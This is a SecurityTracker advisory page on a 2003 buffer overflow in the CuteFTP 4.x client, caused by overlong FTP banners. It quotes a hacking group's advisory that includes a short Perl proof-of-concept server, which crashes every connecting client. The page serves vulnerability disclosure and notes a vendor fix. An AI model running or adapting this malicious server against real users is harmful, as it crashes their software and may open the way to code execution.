SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   CuteFTP Vendors:   GlobalSCAPE, Inc.
CuteFTP Client Buffer Overflow in Processing FTP Banners May Let Remote Users Execute Code
SecurityTracker Alert ID:  1005885
SecurityTracker URL:  http://securitytracker.com/id/1005885
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 4 2003
Impact:   Denial of service via network, Execution of arbitrary code via network, User access via network
Fix Available:  Yes  
Version(s): 4.*
Description:   A buffer overflow vulnerability was reported in the CuteFTP client software. The client will crash when connecting to a malicious FTP server. A remote user may be able to cause the client to execute arbitrary code, but that was not confirmed.

Damage Hacking Group issued an advisory warning that a remote user acting as an FTP server can cause the client to crash when the target user connects to the remote user's FTP server. The overflow can reportedly be triggered by the server sending an FTP banner with more than 2,048 bytes to the client. It may be possible to execute arbitrary code, but the report does not confirm that.

Demonstration exploit code is provided in the Source Message.

Impact:   A remote user acting as an FTP server can cause the client to crash when the client connects to the server. A remote FTP server may be able to cause arbitrary code to be exected on the client (but that was not confirmed in the report).
Solution:   The vendor has reportedly issued a fixed version (5.0), available at:

http://www.cuteftp.com/download/cuteftp.asp

Vendor URL:  www.cuteftp.com/products/cuteftp/index.asp (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [VulnWatch] CuteFTP: buffer overflow


#####################################################*
#      Damage Hacking Group security advisory
#                 www.dhgroup.org
#####################################################*
#Product: CuteFTP client
#Authors: GlobalSCAPE Inc. [www.globalscape.com]
#Vulnerable versions: v.4.*
#Vulnerability: buffer overflow
#####################################################*

#Overview#--------------------------------------------------------------#
"CuteFTP is a Windows based File Transfer Protocol (FTP) client that
allows users to utilize the capabilities of FTP without having to
know all the details of the protocol itself. CuteFTP simplifies FTP
by offering a user-friendly Windows interface instead of a cumbersome
command line utility.  CuteFTP gives novice PC users the ability to
upload, download and edit files on remote FTP servers around the world."

#Problem#---------------------------------------------------------------#
It's possible to crash CuteFTP (and run shellcode(?)) by sending
long (>2048b) ftp-banner to it. As u understand, this problem  could
be used by FTP server.

#Fix#--------------------------------------------------------------------#
Download new verion from www.globalscape.com.

#Exploit#----------------------------------------------------------------#

#!/usr/bin/perl
######################################################
#Here is an example of ftp-server. It will freeze each
#CuteFTP-user, that try to connect to it.
#######################################################
use IO::Socket;
$port = "21";
$data = "a";
$num = "2049";
$buf .= $data x $num;
$server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM, Reuse => 1, Listen => 2)
or die "Couldn't create tcp-server.\n";
while ($client = $server->accept()) {
 print "Client connected.\n";
 print "Attacking...";
 print $client "$buf";
 print "OK\n";
 close($client);
}
#EOF

Best regards               www.dhgroup.org
  D4rkGr3y                    icq 540981



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC